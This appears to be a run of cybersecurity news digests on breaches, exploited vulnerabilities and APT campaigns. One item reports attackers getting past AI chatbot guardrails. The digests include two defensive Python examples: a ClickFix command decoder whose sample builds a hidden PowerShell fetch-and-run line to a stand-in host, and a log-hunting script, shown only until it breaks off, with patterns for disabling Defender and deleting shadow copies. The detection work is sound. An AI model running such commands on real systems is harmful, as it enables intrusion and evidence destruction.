Alright team, it's been a pretty packed 24 hours in the cyber world! We've got some significant breaches to cover, a raft of actively exploited vulnerabilities, and a deep dive into how threat actors are increasingly leveraging AI for everything from malware generation to sophisticated social engineering. Let's get stuck in:

Recent Cyber Attacks and Breaches 🚨

- The FBI is investigating a breach of its systems used to manage surveillance and wiretap warrants, though details on scope and impact are limited. This follows previous incidents, including a 2024 compromise by Chinese Salt Typhoon hackers targeting US government wiretapping platforms via telecom networks.
- Transport for London (TfL) has confirmed that a 2024 breach exposed data for over 7 million customers, a significant increase from the initially reported 5,000. While only 5,000 had bank account data potentially accessed, the larger figure represents the total dataset sitting in the compromised systems.
- The son of a US government contractor has been arrested in the Caribbean, accused of stealing over $46 million in seized cryptocurrency from the US Marshals Service. The alleged theft, traced by blockchain investigators, involved funds from previous seizures, including a portion linked to the 2016 Bitfinex hack.
- A small group of hacktivists compromised at least nine Mexican government agencies, stealing over 195 million identities and tax records, plus other sensitive data. The attackers notably used Anthropic's Claude and OpenAI's ChatGPT, bypassing their guardrails within 40 minutes to find vulnerabilities and build attack tools.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/fbi-investigates-breach-of-surveillance-and-wiretap-systems/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/06/tfl_2024_breach_numbers/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/06/contractor_son_crypto_arrest/
🕶️ Dark Reading | https://www.darkreading.com/application-security/cyberattack-mexico-government-ai-threat

Actively Exploited Vulnerabilities and Zero-Days 🛡️

- Google's Threat Intelligence Group reported 90 actively exploited zero-days in 2025, with enterprise tech products seeing an all-time high of 43. China-linked cyber-espionage groups were the most prolific state-backed actors, particularly targeting security and networking edge devices.
- CISA has ordered federal agencies to patch three iOS security flaws (CVE-2023-41974, CVE-2021-30952, CVE-2023-43000) actively exploited by the Coruna exploit kit. Coruna, a sophisticated spyware-grade kit, has been used by surveillance vendors, suspected Russian state-backed groups, and financially motivated Chinese actors for cyberespionage and crypto-theft.
- Two critical-severity flaws, CVE-2017-7921 (Hikvision) and CVE-2021-22681 (Rockwell Automation), with CVSS scores of 9.8, have been added to CISA's KEV catalog due to active exploitation. Federal agencies must patch these by March 26, 2026, with all organisations strongly urged to do the same.
- Cisco has warned of two more actively exploited vulnerabilities in its Catalyst SD-WAN Manager: CVE-2026-20122 (CVSS 7.1) allowing arbitrary file overwrites, and CVE-2026-20128 (CVSS 5.5) for information disclosure. This follows a recent Five Eyes alert about other SD-WAN flaws, highlighting persistent targeting of these critical network devices.

πŸ•΅πŸΌ The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/05/zero_day_attacks_enterprise_tech_record/
πŸ€– Bleeping Computer | https://www.bleepingcomputer.com/news/security/cisa-warns-of-apple-flaws-exploited-in-spyware-crypto-theft-attacks/
πŸ“° The Hacker News | https://thehackernews.com/2026/03/hikvision-and-rockwell-automation-cvss.html
πŸ•΅πŸΌ The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/06/cisco_sdwan_bugs/

New Threat Research and Tradecraft 🕵️‍♀️

- Europol, alongside Microsoft, Trend Micro, and Cloudflare, has disrupted Tycoon 2FA, a major phishing-as-a-service (PhaaS) platform. Tycoon 2FA was notorious for its adversary-in-the-middle (AitM) attacks that bypassed traditional MFA by relaying authentication prompts in real-time to steal session tokens.
- Microsoft has detailed a new ClickFix social engineering campaign that leverages the Windows Terminal app to deploy the Lumma Stealer malware. Attackers instruct users to launch Windows Terminal and paste hex-encoded, XOR-compressed commands, bypassing traditional Run dialog detections and blending into legitimate administrative workflows.
- A new InstallFix technique, a variation of ClickFix, is being used to push info-stealing malware like Amatera via fake CLI tool installation guides. Threat actors promote these cloned pages, often hosted on legitimate platforms like Squarespace, through malvertising on Google Ads, tricking users into executing malicious `curl-to-bash` commands.
- Bing AI's search feature was observed promoting fake OpenClaw GitHub repositories that pushed information-stealing and proxy malware. Threat actors created seemingly legitimate GitHub organisations and repositories, which were then recommended by Bing AI, leading users to install Atomic Stealer or Vidar stealer and GhostSocks proxy malware.
- A China-linked APT, UAT-9244 (associated with FamousSparrow and Tropic Trooper), is targeting South American telecom providers with a new malware toolkit. This includes TernDoor (Windows backdoor), PeerTime (Linux backdoor using BitTorrent for C2), and BruteEntry (a brute-force scanner building proxy infrastructure).
- The Pakistan-aligned Transparent Tribe APT is using AI-powered coding tools to mass-produce "vibeware" malware implants in a campaign targeting India. This "Distributed Denial of Detection" (DDoD) strategy involves flooding targets with high-volume, mediocre binaries written in lesser-known languages like Nim, Zig, and Crystal, relying on trusted services for C2.
- North Korean APTs Jasper Sleet and Coral Sleet are enhancing their IT worker scams with AI to improve scale and precision. AI assists in fabricating convincing digital identities, generating resumes and cover letters, maintaining personas during interviews (including voice-changing software), and even developing malware and automating attack workflows.
- Iran has reportedly unified cyber and kinetic attacks into a single doctrine, leveraging IP camera compromises for operational support and battle damage assessment during missile strikes. Check Point Research observed intensified targeting of Hikvision and Dahua cameras in the Middle East, with activity patterns correlating with kinetic events.

πŸ•ΆοΈ Dark Reading | https://www.darkreading.com/threat-intelligence/tycoon-2fa-europol-vendors-bust-phishing-platform
πŸ“° The Hacker News | https://thehackernews.com/2026/03/microsoft-reveals-clickfix-campaign.html
πŸ•΅πŸΌ The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/06/microsoft_spots_clickfix_campaign_abusing/
πŸ€– Bleeping Computer | https://www.bleepingcomputer.com/news/security/fake-claude-code-install-guides-push-infostealers-in-installfix-attacks/
πŸ€– Bleeping Computer | https://www.bleepingcomputer.com/news/security/bing-ai-promoted-fake-openclaw-github-repo-pushing-info-stealing-malware/
πŸ€– Bleeping Computer | https://www.bleepingcomputer.com/news/security/chinese-state-hackers-target-telcos-with-new-malware-toolkit/
πŸ“° The Hacker News | https://thehackernews.com/2026/03/transparent-tribe-uses-ai-to-mass.html
πŸ•ΆοΈ Dark Reading | https://www.darkreading.com/threat-intelligence/north-korean-apts-ai-it-worker-scams
πŸ•ΆοΈ Dark Reading | https://www.darkreading.com/threat-intelligence/iran-cyber-kinetic-war-doctrine

Regulatory Issues and Data Privacy ⚖️

- The House Energy and Commerce Committee advanced the Kids Internet and Digital Safety (KIDS) Act in a party-line vote, drawing criticism from Democrats for perceived weak regulations. Concerns include a "toothless" knowledge standard for tech companies, lack of a "duty of care" to proactively mitigate harms, and preemption language that could undercut stronger state laws.
- Other bills marked up include Sammy's Law, aiming to notify parents of child risk on third-party safety apps, and the App Store Accountability Act, requiring parental consent for app downloads by minors. Digital freedom advocates criticised these bills for potentially threatening privacy and free expression by pushing age assurance techniques.

πŸ—žοΈ The Record | https://therecord.media/house-panel-marks-up-kids-digital-safety-act

Government Staffing and Program Changes 🏛️

- The Department of Homeland Security (DHS) is undergoing a significant IT and information security leadership overhaul, with CISO Hemant Baidwan and Deputy CISO Amanda Day reportedly being replaced. This realignment, led by DHS CIO Antoine McCord, aims to centralise IT control and follows other high-profile departures at CISA and FEMA.
- Congress is moving to reauthorise and fund the Rural and Municipal Utility Advanced Cybersecurity program at the Department of Energy, approving $250 million in grants over five years. This program is crucial for smaller utilities, often lacking robust cybersecurity operations, to defend against escalating threats, including those from nation-state actors like Volt Typhoon.

🤫 CyberScoop | https://fedscoop.com/dhs-it-leadership-overhaul-includes-ciso-deputy-ciso/
🤫 CyberScoop | https://cyberscoop.com/house-committee-advances-rural-utility-cybersecurity-act/

Cybercrime and Law Enforcement 💰

- A Ghanaian national, Derrick Van Yeboah, has pleaded guilty to his role in a $100 million fraud ring involving business email compromise (BEC) attacks and romance scams. Yeboah, a high-ranking member of the Ghana-based operation, personally conducted many romance scams, contributing to over $10 million in losses.
- The scammers targeted vulnerable individuals online, tricking them into depositing money into US middlemen's accounts, and also defrauded businesses via spoofed emails. Yeboah faces up to 20 years in prison and has agreed to pay over $10 million in restitution.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/ghanain-man-pleads-guilty-to-role-in-100-million-fraud-ring/

#CyberSecurity #ThreatIntelligence #InfoSec #CyberAttack #ZeroDay #Vulnerability #APT #Malware #Phishing #AI #SocialEngineering #DataPrivacy #GovernmentSecurity #LawEnforcement #IncidentResponse
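The Windows Terminal ClickFix item above describes pasted commands that arrive hex-encoded and XOR-obscured. What follows is an added triage example, not code from Microsoft's write-up or from this digest: it assumes a hex-then-single-byte-XOR scheme (the campaign's real encoding is not reproduced here) and shows how an analyst can take a captured command line, pull out the hex blob, and brute-force the key until loader keywords surface. The sample command line, the keyword list and the key are constructed for illustration.

```python
"""
Triage helper for ClickFix-style pasted commands: pull long hex blobs out of a
command line, hex-decode them and, when the result is not readable or carries
no loader keywords, try every single-byte XOR key and keep the best one.

Added example, not code from Microsoft's report. Hex + single-byte XOR is an
assumed scheme used for illustration; the sample command line is constructed.
"""
import re
import string

# 16+ bytes of contiguous hex that is not part of a longer hex run.
HEX_BLOB = re.compile(r"(?<![0-9A-Fa-f])((?:[0-9A-Fa-f]{2}){16,})(?![0-9A-Fa-f])")

# Substrings a decoded first stage commonly contains (assumed indicator list).
KEYWORDS = (b"powershell", b"iex", b"invoke-expression", b"downloadstring",
            b"http://", b"https://", b"frombase64string", b"-enc ", b"cmd /c")

PRINTABLE = set(string.printable.encode("ascii"))


def printable_ratio(data: bytes) -> float:
    """Share of bytes that are printable ASCII (1.0 = all printable)."""
    return sum(b in PRINTABLE for b in data) / len(data) if data else 0.0


def keyword_score(data: bytes) -> int:
    """Number of distinct loader keywords present, case-insensitive."""
    low = data.lower()
    return sum(1 for k in KEYWORDS if k in low)


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def decode_blob(blob_hex: str):
    """Return (xor_key_or_None, decoded_bytes, score) for the best decoding.

    The plain hex decode is accepted when it is readable and already scores;
    otherwise every single-byte key is tried and the highest-scoring readable
    candidate wins. A None key with score 0 means nothing matched.
    """
    raw = bytes.fromhex(blob_hex)
    best = (None, raw, keyword_score(raw))
    if printable_ratio(raw) > 0.9 and best[2] > 0:
        return best
    for key in range(1, 256):
        cand = xor_bytes(raw, key)
        if printable_ratio(cand) < 0.9:
            continue
        s = keyword_score(cand)
        if s > best[2]:
            best = (key, cand, s)
    return best


def triage(cmdline: str) -> list:
    """One finding per hex blob in the command line; 'suspicious' is set when
    two or more loader keywords surface after decoding."""
    findings = []
    for m in HEX_BLOB.finditer(cmdline):
        key, decoded, s = decode_blob(m.group(1))
        findings.append({
            "blob_bytes": len(m.group(1)) // 2,
            "xor_key": key,
            "decoded": decoded.decode("ascii", "replace"),
            "score": s,
            "suspicious": s >= 2,
        })
    return findings


# --- constructed sample: what a ClickFix page might tell the user to paste ---
STAGE = "powershell -w hidden -c iex (iwr https://example.invalid/s.ps1 -UseBasicParsing)"
SAMPLE_KEY = 0x5A  # assumed key, for the sample only


def make_sample(plain: str, key: int) -> str:
    blob = xor_bytes(plain.encode("ascii"), key).hex()
    return f"wt.exe pwsh -nop -c \"$h='{blob}';$k={key}\""


SAMPLE_CMD = make_sample(STAGE, SAMPLE_KEY)

if __name__ == "__main__":
    for finding in triage(SAMPLE_CMD):
        print(finding)
```

The printable-ratio gate keeps the brute force from "finding" keys that only produce binary noise; the score threshold of two keywords is a starting point to tune against your own command-line telemetry.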

FBI investigates breach of surveillance and wiretap systems

The U.S. Federal Bureau of Investigation (FBI) confirmed on Thursday that it's investigating a breach that affected systems used to manage surveillance and wiretap warrants.

BleepingComputer

CNN: Exclusive: DHS admits its website showcasing the ‘worst of the worst’ immigrants was rife with errors. “The Department of Homeland Security admitted that its website featuring what it calls the ‘worst of the worst’ arrested immigrants was rife with errors and changed the site this week after receiving questions from CNN about it.”

https://rbfirehose.com/2026/02/24/exclusive-dhs-admits-its-website-showcasing-the-worst-of-the-worst-immigrants-was-rife-with-errors-cnn/

Looks like a busy 24 hours in the cyber world with some significant breaches, new malware insights, a critical Patch Tuesday, and important discussions around AI and government security. Let's dive in:

Healthcare Data Breach and Payroll Scams 🚨
- ApolloMD, a Georgia-based healthcare company, reported a data breach impacting over 626,000 individuals, with sensitive health information compromised by the Qilin ransomware gang.
- Law enforcement in the Netherlands arrested a third suspect involved in the JokerOTP phishing-as-a-service operation, which caused over $10 million in losses by intercepting MFA passcodes across 28,000 attacks.
- "Payroll pirates" are exploiting help desks through social engineering to reset employee credentials and MFA, then using internal VDI to access payroll systems like Workday and redirect paychecks, highlighting the need to treat identity as the new perimeter.

πŸ—žοΈ The Record | https://therecord.media/georgia-healthcare-company-data-breach-impacts-620000
πŸ€– Bleeping Computer | https://www.bleepingcomputer.com/news/security/police-arrest-seller-of-jokerotp-mfa-passcode-capturing-tool/
πŸ•΅πŸΌ The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/11/payroll_pirates_business_social_engineering/

North Korean Deepfakes, LummaStealer Resurgence, and IRC Botnets 🛡️
- North Korea's UNC1069 group is targeting the cryptocurrency sector with sophisticated social engineering, using AI-generated deepfake videos in fake Zoom meetings and the ClickFix technique to deploy seven new macOS malware families (WAVESHAPER, HYPERCALL, HIDDENCALL, SILENCELIFT, DEEPBREATH, SUGARLOADER, CHROMEPUSH) for extensive data exfiltration and TCC bypass.
- LummaStealer (LummaC2) infostealer infections are surging again, now primarily delivered via the heavily obfuscated CastleLoader malware, which uses ClickFix techniques and performs environment checks to evade analysis before deploying its payload.
- The "Crazy" ransomware gang is leveraging legitimate employee monitoring software (Net Monitor for Employees Professional) and remote support tools (SimpleHelp) for persistence, detection evasion, and pre-ransomware reconnaissance, including monitoring for cryptocurrency wallet activity, often gaining initial access through compromised SSL VPN credentials.
- A new Linux botnet, SSHStalker, is using the antiquated IRC protocol for command-and-control, relying on noisy SSH scanning, cron-based persistence, and a large arsenal of 15-year-old Linux kernel exploits (2.6.x era) to compromise systems, with observed capabilities for AWS key harvesting, cryptomining, and DDoS.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/north-korean-hackers-use-new-macos-malware-in-crypto-theft-attacks/
📰 The Hacker News | https://thehackernews.com/2026/02/north-korea-linked-unc1069-uses-ai.html
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/lummastealer-infections-surge-after-castleloader-malware-campaigns/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/crazy-ransomware-gang-abuses-employee-monitoring-tool-in-attacks/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/new-linux-botnet-sshstalker-uses-old-school-irc-for-c2-comms/
📰 The Hacker News | https://thehackernews.com/2026/02/sshstalker-botnet-uses-irc-c2-to.html

Microsoft's Patch Tuesday: Six Actively Exploited Zero-Days ⚠️
- Microsoft's February Patch Tuesday addressed 59 vulnerabilities, including six actively exploited zero-days, prompting CISA to add them to its Known Exploited Vulnerabilities (KEV) catalog for urgent patching by federal agencies.
- Three of the actively exploited flaws are security feature bypasses (CVE-2026-21510 in Windows Shell, CVE-2026-21513 in MSHTML, CVE-2026-21514 in Word) that can lead to remote code execution (RCE) by tricking users into opening malicious files or links, bypassing SmartScreen and OLE security controls.
- The remaining actively exploited bugs include two elevation-of-privilege vulnerabilities (CVE-2026-21519 in Desktop Window Manager, CVE-2026-21533 in Windows Remote Desktop Services) and one denial-of-service flaw (CVE-2026-21525 in Windows Remote Access Connection Manager).
- A new RCE vulnerability, CVE-2026-20841, has been found in Notepad's recently added Markdown feature, allowing attackers to launch "unverified protocols" and execute files if a user clicks a malicious embedded link, though no in-the-wild exploitation has been observed yet.

💡 Dark Reading | https://www.darkreading.com/vulnerabilities-threats/microsoft-fixes-6-actively-exploited-zero-days
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/10/microsofts_valentines_gift_to_admins/
📰 The Hacker News | https://thehackernews.com/2026/02/microsoft-patches-59-vulnerabilities.html
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/11/notepad_rce_flaw/

Telnet's Lingering Legacy and Potential Pre-Disclosure Warnings 🌐
- Threat intelligence suggests that major telcos likely received advance warning about the critical Telnet vulnerability (CVE-2026-24061) before its public disclosure, as global Telnet traffic "fell off a cliff" days prior, indicating potential pre-advisory port 23 filtering by Tier 1 transit providers.
- Despite a global decline in Telnet traffic, the Asia-Pacific region continues to show high exposure, with many consumer-grade routers and IoT devices still using the insecure protocol, highlighting a persistent and unnecessary attack surface.
- The reduction in Telnet traffic, particularly in the US, might be an unintended positive consequence of network infrastructure providers blocking aggressive web-scraping traffic from AI companies, as the congestion caused by such activity forced broader filtering adjustments.

πŸ•΅πŸΌ The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/11/were_telcos_tipped_off_to/
πŸ’‘ Dark Reading | https://www.darkreading.com/threat-intelligence/asia-fumbles-telnet-threat-traffic

AI's Privacy Pitfalls: Caricatures, Healthcare, and Data Blind Spots 🔒
- The viral trend of posting AI-generated work caricatures on social media poses significant risks, as users may inadvertently expose sensitive company data from their LLM prompt history, making them targets for social engineering and account takeovers.
- AI health apps, despite offering "HIPAA-ready" or "HIPAA-compliant" infrastructure, are generally not subject to the same rigorous data protection laws (like HIPAA) as traditional healthcare providers, raising concerns about the privacy and security of personal medical data shared with these unregulated entities.
- Organisations are widely adopting AI without sufficient knowledge of the data populating these tools; a recent survey found only 11% of IT decision-makers are confident they can account for 100% of their data, creating a "data knowledge disconnect" that risks sensitive data leakage and regulatory non-compliance.

πŸ•΅πŸΌ The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/11/ai_caricatures_social_media_bad_security/
🀫 CyberScoop | https://cyberscoop.com/ai-healthcare-apps-hipaa-privacy-risks-openai-anthropic/
πŸ’‘ Dark Reading | https://www.darkreading.com/data-privacy/do-we-know-enough-about-data-populating-ai

Government Data Security and Digital Control 🏛️
- The UK government is struggling with legacy IT systems that hinder secure information sharing, contributing to incidents like the Afghan data breach, and making it difficult to implement technical measures to prevent human error in data leaks.
- Russia's communications regulator, Roskomnadzor, is deliberately throttling Telegram and pushing its state-controlled messaging app, Max, citing non-compliance with Russian law, a move criticised internally for potentially impacting emergency communications in border regions.

πŸ•΅πŸΌ The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/11/legacy_systems_blamed_as_ministers_promise_no_repeat_of_afghan_breach/
πŸ—žοΈ The Record | https://therecord.media/russia-throttles-telegram-pushes-its-own-messaging-app

CISA Shutdown Concerns and Leadership Appointments 🇺🇸
- The interim CISA chief warned Congress that a government shutdown would severely degrade the agency's capacity to provide timely guidance and conduct proactive threat hunting, forcing over a third of its frontline security experts to work without pay while cyber threats persist.
- Army Lt. Gen. Joshua Rudd, despite lacking prior cyber warfare or intelligence experience, has advanced to the full Senate for confirmation as the next head of U.S. Cyber Command and the National Security Agency, filling a 10-month leadership void.

πŸ—žοΈ The Record | https://therecord.media/interim-cisa-chief-tells-congress-threats-continue-during-shutdown
πŸ—žοΈ The Record | https://therecord.media/cyber-command-nsa-nominee-rudd-advances-to-senate

#CyberSecurity #ThreatIntelligence #Ransomware #Malware #ZeroDay #Vulnerability #PatchTuesday #SocialEngineering #AI #DataPrivacy #InfoSec #CyberAttack #IncidentResponse #GovernmentSecurity #NationState

Georgia healthcare company data breach impacts more than 620,000

The company told victims in September about the breach, and said an investigation revealed hackers were in ApolloMD’s IT environment between May 22 and May 23.

🚨 Alleged breach targets Spain’s Ministry of Science
Threat actor claims IDOR flaw exposed passports, DNI/NIE records & financial data.

https://www.technadu.com/alleged-data-breach-targets-spains-ministry-of-science-innovation-and-universities/619485/

#InfoSec #DataBreach #IDOR #GovernmentSecurity #Spain

Belgian government institutions including federal and provincial websites, and key energy entities were reportedly targeted with large-scale DDoS attacks by a pro-Russian hacker group ahead of a major EU summit.

#CyberSecurity #DDoSAttack #GovernmentSecurity #InfosecK2K

An alleged ransomware incident involving government infrastructure in Baja California, Mexico has been claimed by a threat actor group, with the situation currently pending verification.

This case underscores recurring challenges in public-sector incident response: validating threat claims, managing disclosure timelines, and coordinating across agencies without amplifying unconfirmed information.

How should public-sector SOCs handle externally imposed ransom deadlines?

Source: https://www.linkedin.com/posts/hackmanac_cyberattack-alert-mexico-gobierno-activity-7414283719991255040-Uw_g/


#ThreatIntel #GovernmentSecurity #IncidentResponse #Ransomware #CyberInvestigations #Infosec

Data breach detected targeting the USA 🇺🇸 government sector, specifically the Illinois Department of Employment Security. Confidence level: medium. #DataBreach #GovernmentSecurity #CyberThreats
High confidence of a DDoS attack targeting the Office of the Secretary of the Committee on Drug Addiction Treatment and Rehabilitation in Thailand 🇹🇭, affecting government administration and political operations. #DDoS #CyberThreats #GovernmentSecurity

Alright team, it's been a busy 24 hours in the cyber world with significant updates on nation-state activity, a couple of actively exploited vulnerabilities, new malware campaigns, and some serious data privacy discussions. Let's dive in:

Recent Cyber Attacks & Breaches 🚨

- France's Interior Ministry is investigating a malicious cyber intrusion into its email servers, confirming unauthorised access to several accounts and dozens of confidential documents, including judicial records and wanted persons' data.
- Analytics vendor Mixpanel denies being the source of data stolen from Pornhub, stating the data was last accessed by a legitimate Pornhub employee account in 2023, not during Mixpanel's November 2025 security incident.
- Threat actors are exploiting WhatsApp's legitimate device-linking feature in a campaign dubbed "GhostPairing," tricking users with fake Facebook verification pages to link the attacker's browser to their WhatsApp account, gaining full conversation history access.
- European law enforcement has dismantled two Ukraine-based call centre networks responsible for over $13.7 million in scams, where criminals posed as police or bank employees to trick victims into transferring funds or installing remote access software.
- The FTC has ordered blockchain company Illusory Systems to distribute approximately $37.5 million in recovered funds to customers affected by the 2022 Nomad crypto platform hack, which saw $186 million stolen due to inadequately tested code.

πŸ—žοΈ The Record | https://therecord.media/france-interior-ministry-email-breach-investigation
πŸ•΅πŸΌ The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/16/mixpanel_breach_leak_denial/
πŸ€– Bleeping Computer | https://www.bleepingcomputer.com/news/security/whatsapp-device-linking-abused-in-account-hijacking-attacks/
πŸ—žοΈ The Record | https://therecord.media/european-police-bust-ukraine-based-call-centers
πŸ—žοΈ The Record | https://therecord.media/ftc-settlement-nomad-platform-return-customers-cryptocurrency

Vulnerabilities: Zero-Days & Active Exploitation 🛡️

- SonicWall has warned customers to patch a medium-severity local privilege escalation flaw (CVE-2025-40602) in its SMA1000 Appliance Management Console, which is being chained with a critical pre-authentication deserialisation flaw (CVE-2025-23006) for unauthenticated remote code execution with root privileges.
- The critical React2Shell vulnerability (CVE-2025-55182), an insecure deserialisation issue in React Server Components, is being actively exploited by a ransomware gang (Weaxor) to gain initial access and deploy encryptors in under a minute.
- System administrators should review Windows event logs and EDR telemetry for process creation from Node or React binaries, as well as unusual outbound connections or disabled security solutions, as patching alone might not be sufficient due to the speed of exploitation.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/sonicwall-warns-of-new-sma1000-zero-day-exploited-in-attacks/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/critical-react2shell-flaw-exploited-in-ransomware-attacks/

New Threat Research: APTs, Malware & Tradecraft 🕵️‍♀️

- The Russian state-sponsored APT28 (BlueDelta) has been conducting a sustained credential-harvesting campaign targeting Ukrainian UKR.net webmail users since June 2024, using fake login pages on legitimate services like Mocky and shortened links in PDF attachments.
- Amazon security researchers report that Russia’s GRU (APT44/Sandworm) has shifted tactics since 2025, now primarily targeting misconfigured network edge devices in Western critical infrastructure, particularly the energy sector, instead of relying on novel vulnerabilities.
- China-linked threat actor Ink Dragon (Jewelbug) is increasingly targeting government entities in Europe, Southeast Asia, and South America, leveraging vulnerable web applications to deploy web shells, ShadowPad IIS Listener modules, and an updated FINALDRAFT backdoor for stealthy, long-term persistence and data exfiltration.
- Operation ForumTroll, an unknown threat actor, is targeting Russian scholars in political science and economics with personalised phishing emails disguised as eLibrary plagiarism reports, delivering the Tuoni C2 framework via malicious LNK files and PowerShell scripts.
- A new Android Malware-as-a-Service (MaaS) called Cellik is being advertised, offering the ability to embed itself into any Google Play Store app, stream screens, intercept notifications, exfiltrate files, and use a hidden browser mode.
- The "GhostPoster" malware has been found in 17 Firefox add-ons with over 50,000 downloads, using steganography in logo files to embed malicious JavaScript that hijacks affiliate links, injects tracking code, strips security headers, and performs ad/click fraud.
- Forensic researchers have discovered "ResidentBat," a previously unknown Android spyware, on a Belarusian journalist's phone, believed to have been installed during KGB detention and capable of accessing call logs, messages, microphone recordings, and files.

📰 The Hacker News | https://thehackernews.com/2025/12/apt28-targets-ukrainian-ukr-net-users.html
🗞️ The Record | https://therecord.media/russian-bluedelta-hackers-ran-phishing-ukraine-webmail
🗞️ The Record | https://therecord.media/russia-gru-hackers-target-energy-sector-sandworm
📰 The Hacker News | https://thehackernews.com/2025/12/china-linked-ink-dragon-hacks.html
📰 The Hacker News | https://thehackernews.com/2025/12/new-forumtroll-phishing-attacks-target.html
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/cellik-android-malware-builds-malicious-versions-from-google-play-apps/
📰 The Hacker News | https://thehackernews.com/2025/12/ghostposter-malware-found-in-17-firefox.html
🗞️ The Record | https://therecord.media/spyware-belarus-journalist-rsf

Data Privacy Concerns 🔒

- Four popular browser extensions (Urban VPN Proxy, 1ClickVPN Proxy, Urban Browser Guard, Urban Ad Blocker) have been caught harvesting text from AI chatbot conversations (ChatGPT, Claude, Gemini, etc.) from over 8 million users and sending it to developers, despite some claiming privacy protection.
- Meta has rolled out a new policy to personalise content and ad recommendations based on users' interactions with its generative AI features, with no opt-out option, raising significant privacy concerns among experts about the use of sensitive chat data.
- Digital rights organisation noyb alleges that TikTok and Grindr are violating European GDPR laws by tracking user activities across apps, with TikTok reportedly acknowledging it tracked a user's Grindr activity and other app usage, including shopping cart items.

πŸ•΅πŸΌ The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/16/chrome_edge_privacy_extensions_quietly/
πŸ—žοΈ The Record | https://therecord.media/privacy-advocates-see-risks-meta-ai-ad-targeting
πŸ—žοΈ The Record | https://therecord.media/tiktok-grindr-data-tracking-noyb

Government & Defence Strategy 🏛️

- NATO's Assistant Secretary General for Cyber and Digital Transformation stressed the existential urgency for the alliance to develop sovereign cloud-based technologies, highlighting the need for speed, collaboration, and designing systems that enhance autonomy and allied trust.
- Outgoing GAO chief Gene Dodaro warned lawmakers that the U.S. is "very vulnerable" to cyber threats and expressed concern that CISA is "taking our foot off the gas," having lost about a third of its staff, and urged for a permanent director to be confirmed swiftly.

πŸ•΅πŸΌ The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/17/sovereign_cloud_is_existential_nato/
🀫 CyberScoop | https://fedscoop.com/cisa-workforce-threats-gao-cybersecurity-gene-dodaro/

#CyberSecurity #ThreatIntelligence #APT #Ransomware #Malware #ZeroDay #Vulnerability #DataPrivacy #InfoSec #CyberAttack #NationState #Phishing #SocialEngineering #CloudSecurity #GovernmentSecurity #CISA #GDPR
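The React2Shell guidance above (review process creation from Node or React binaries, unusual outbound connections, and disabled security tooling) as an added detection example, not code from the articles or any vendor: three assumed rules run over constructed Sysmon-style JSON events (EventID 1 process create, EventID 3 network connect). Field names follow Sysmon; the shell list, the defence-evasion patterns, the "internal network" definition and the sample events are all assumptions made for illustration.

```python
"""
Hunt over Sysmon-style telemetry for the post-exploitation pattern a
React2Shell intrusion leaves behind: the Node/React server process spawning a
shell, node opening outbound connections it has no business making, and
defensive tooling being switched off or recovery points destroyed.

Added example, not code from the articles or any vendor. Field names follow
Sysmon (EventID 1 = process create, 3 = network connect); the rule lists and
the sample events are assumptions/constructed.
"""
import ipaddress
import json
import re

NODE_IMAGES = {"node", "node.exe", "nodejs", "next-server"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash", "dash",
          "certutil.exe", "bitsadmin.exe", "mshta.exe", "rundll32.exe"}
# Command lines that blind defenders or destroy recovery points (assumed list).
DEFENSE_EVASION = [
    re.compile(r"set-mppreference.*-disablerealtimemonitoring\s+\$?true", re.I),
    re.compile(r"\b(sc|net)(\.exe)?\s+stop\s+\S+", re.I),
    re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"\bwevtutil(\.exe)?\s+cl\b", re.I),
]
# Explicit ranges rather than ipaddress.is_private/is_global, so that the
# result does not depend on the Python version's special-registry tables.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]
WEB_PORTS = {80, 443}


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_internal(ip: str) -> bool:
    """True for RFC 1918 / loopback / link-local. Unparsable values count as
    internal so a malformed field never raises an alert on its own."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return True
    return any(addr in net for net in INTERNAL_NETS)


def evaluate(ev: dict) -> list:
    """Return the names of the rules that fire on a single event."""
    hits = []
    eid = ev.get("EventID")
    if eid == 1:
        parent = basename(ev.get("ParentImage", ""))
        child = basename(ev.get("Image", ""))
        cmd = ev.get("CommandLine", "")
        if parent in NODE_IMAGES and child in SHELLS:
            hits.append("node_spawns_shell")
        if any(p.search(cmd) for p in DEFENSE_EVASION):
            hits.append("defense_evasion_cmd")
    elif eid == 3:
        image = basename(ev.get("Image", ""))
        dst = ev.get("DestinationIp", "")
        port = int(ev.get("DestinationPort", 0))
        if image in NODE_IMAGES and not is_internal(dst) and port not in WEB_PORTS:
            hits.append("node_external_nonweb_egress")
    return hits


def hunt(log_lines: str) -> list:
    """Run every rule over newline-delimited JSON events and return
    (line_no, rule, host, image) tuples."""
    alerts = []
    for n, line in enumerate(log_lines.splitlines(), 1):
        if not line.strip():
            continue
        ev = json.loads(line)
        for rule in evaluate(ev):
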